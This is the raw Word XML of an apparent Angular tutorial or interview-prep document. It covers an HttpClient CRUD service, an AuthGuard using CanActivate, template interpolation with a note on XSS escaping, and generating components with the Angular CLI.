      </w:r>
    </w:p>
    <w:p w14:paraId="7303591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27E119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19758AED"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1D0AB">
          <v:rect id="_x0000_i3759" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5F5AFF"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nject HttpClient in a Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E32CB9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reate a service (recommended) to handle API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBA443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employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD7C753"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service.ts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0690B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18EACD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02D37A8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0610B902" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A96300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EBD9D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4B4F488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B9E62F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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4646BA13" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="225D54C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Url = 'http://localhost:8080/api/employees';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718A2304" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B6E50A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32190EC7" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0658C8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Employees(): Observable&lt;any&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171678C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get(this.apiUrl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5424100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88D7E9" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ACFAB8F"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ddEmployee(employee: any): Observable&lt;any&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF5635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ost(this.apiUrl, employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF0EB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8745C81" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="330DA43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Employee(id: number, employee: any): Observable&lt;any&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D61CCA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ut(`${this.apiUrl}/${id}`, employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF470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B85AADF" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21F8DF8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leteEmployee(id: number): Observable&lt;any&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A38EC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delete(`${this.apiUrl}/${id}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A8B77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792336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ECAEFF4"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EF2F6">
          <v:rect id="_x0000_i3760" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A642EF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 Service in a Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3069C27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component.ts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645562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3AB6BFAB"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EmployeeService } from './employee.service';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE3C789" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="306A800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00BE5B4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mployee',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C1226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mployee.component.html'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095212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C89790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Component implements OnInit {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F40C3E" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8685C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mployees: any[] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC7A815" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2287FBF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employeeService: EmployeeService) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DA1C14" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B7413F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1F2DD4E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ervice.getEmployees().subscribe(data =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4C646D"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59B5754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160E9C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DF642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B611678"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B7BBE">
          <v:rect id="_x0000_i3761" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A7AC66"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upported HTTP Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098D7E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http.get&lt;T&gt;()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143600F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ost&lt;T&gt;()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D0DB2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ut&lt;T&gt;()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4573461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delete&lt;T&gt;()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72540C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atch&lt;T&gt;()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A6A3EB" w14:textId="2D031D4F"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762" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6896BE" w14:textId="332841ED" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB6447">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="924" w:name="_Toc197868138"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is authguard in angular</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="924"/>
    </w:p>
    <w:p w14:paraId="2994AC9D" w14:textId="158B45AB" w:rsidR="00231977" w:rsidRPr="003C7C02" w:rsidRDefault="00231977"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is AuthGuard in Angular?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AEC22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uthGuard is a </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>route guard</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Angular used to </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>protect routes</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from unauthorized access. It determines whether a route can be activated (navigated to) based on some logic, typically user authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165A1D38"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F5E43">
          <v:rect id="_x0000_i3763" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1FADC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Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5AB39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want to restrict access to certain pages (e.g., /dashboard) unless the user is logged in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA86AD7"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FE683">
          <v:rect id="_x0000_i3764" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E17A2C8"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5BCCA2F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implement the CanActivate interface in a guard class and return true (allow access) or false (deny access), or an Observable&lt;boolean&gt; / Promise&lt;boolean&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5495463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15F2">
          <v:rect id="_x0000_i3765" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB4377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Use AuthGuard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C108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Generate Guard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5969639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guard auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1E99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mplement Guard Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FED26E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67FB0BC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anActivate, Router } from '@angular/router';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25003F5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AuthService } from './auth.service';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158AC938" w14:textId="77777777" w:rsidR="00231977" w:rsidRPr="003C7C02" w:rsidRDefault="00231977" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0856304E"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6D87D4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0EE9C3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8F7507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Guard implements CanActivate {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D7EFF5" w14:textId="77777777" w:rsidR="00231977" w:rsidRPr="003C7C02" w:rsidRDefault="00231977" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="311D38F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authService: AuthService, private router: Router) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491FF11E" w14:textId="77777777" w:rsidR="00231977" w:rsidRPr="003C7C02" w:rsidRDefault="00231977" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6971E70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nActivate(): boolean {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B8332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this.authService.isLoggedIn()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228E7F6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rue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBAB3B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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488E364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outer.navigate(['/login']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C4E264"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false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262DCA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5B7D49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63FAD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9B4E0A"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pply Guard to Routes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570DD57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48C2E53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dashboard', component: DashboardComponent, canActivate: [AuthGuard] },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E01E2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login', component: LoginComponent }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF2DB8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DD680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B59D0A">
          <v:rect id="_x0000_i3766" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EED544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w:t>
      </w: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Guard Interfaces in Angular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C6D8F3"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 – Prevent access to a route.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647D9BB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Child – Prevent access to child routes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CCD47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Load – Prevent lazy-loaded modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FEB5A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Deactivate – Prevent leaving a route (unsaved changes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A917DB" w14:textId="30B9319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767" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2CB2AF" w14:textId="36671351" w:rsidR="00A976FD" w:rsidRPr="00CE4B95" w:rsidRDefault="003B1204">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="925" w:name="_Toc197868139"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is interpolation in angular</w:t>
      </w:r>
      <w:r w:rsidR="00A976FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="925"/>
    </w:p>
    <w:p w14:paraId="5513074D" w14:textId="0C8DDCBC" w:rsidR="00D57784" w:rsidRPr="003C7C02" w:rsidRDefault="00D57784"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terpolation</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Angular is a technique used to </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>display dynamic data</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the component class into the HTML template.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560BF65E"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A973B">
          <v:rect id="_x0000_i3768" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F76A2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5B083F4"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expression }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC3186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8740">
          <v:rect id="_x0000_i3769" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8C35C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2FF817FE"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evaluates the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>expression inside {{ }}</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and renders the result in the DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBD390C"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993C5">
          <v:rect id="_x0000_i3770" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0542700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60D0A13F"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3EC6CC86"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6BA0F3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 'Angular Basics';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC28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57A7F4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4771EB09"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h1&gt;{{ title }}&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7852981A"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13A2038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Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496D0843"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6A729">
          <v:rect id="_x0000_i3771" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E2C61B"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Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D6FCD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Variables: {{ username }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AF51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ethod calls: {{ getUserName() }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE6A805"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ressions: {{ 10 + 20 }}, {{ name.toUpperCase() }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C8A734"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E7AB63">
          <v:rect id="_x0000_i3772" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C3322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not Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50671DB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atements like if, for, while</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEAD2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ssignments like =, ++, --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AC020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6A01F">
          <v:rect id="_x0000_i3773" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED6BE8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ecurity Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F572D48"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w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>escapes</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interpolated content to prevent XSS attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623CE640" w14:textId="52CBCC9B"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774" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7394C8BE" w14:textId="2A9C6E07" w:rsidR="00A976FD" w:rsidRPr="00CE4B95" w:rsidRDefault="00787882">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="926" w:name="_Toc197868140"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to create components in angular</w:t>
      </w:r>
      <w:r w:rsidR="00A976FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="926"/>
    </w:p>
    <w:p w14:paraId="79B0CD44" w14:textId="5553AC1F" w:rsidR="00001CEE" w:rsidRPr="003C7C02" w:rsidRDefault="00001CEE"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Create Components in Angular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBFA8B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You can create a component in Angular using the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Angular CLI</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B7FD18"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1B31A2">
          <v:rect id="_x0000_i3775" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52757DA6"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ing Angular CLI (Recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006233C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in the terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52693767"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component-name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297F49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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13396EB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user-profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D598DF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will create:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA91A8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rc/app/user-profile/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656A50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ts      // Component class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8EF63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html    // Template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19888BD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css     // Styles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2669E4F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user-profile.component.spec.ts // Unit test (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4780B49D"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4C043F">
          <v:rect id="_x0000_i3776" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
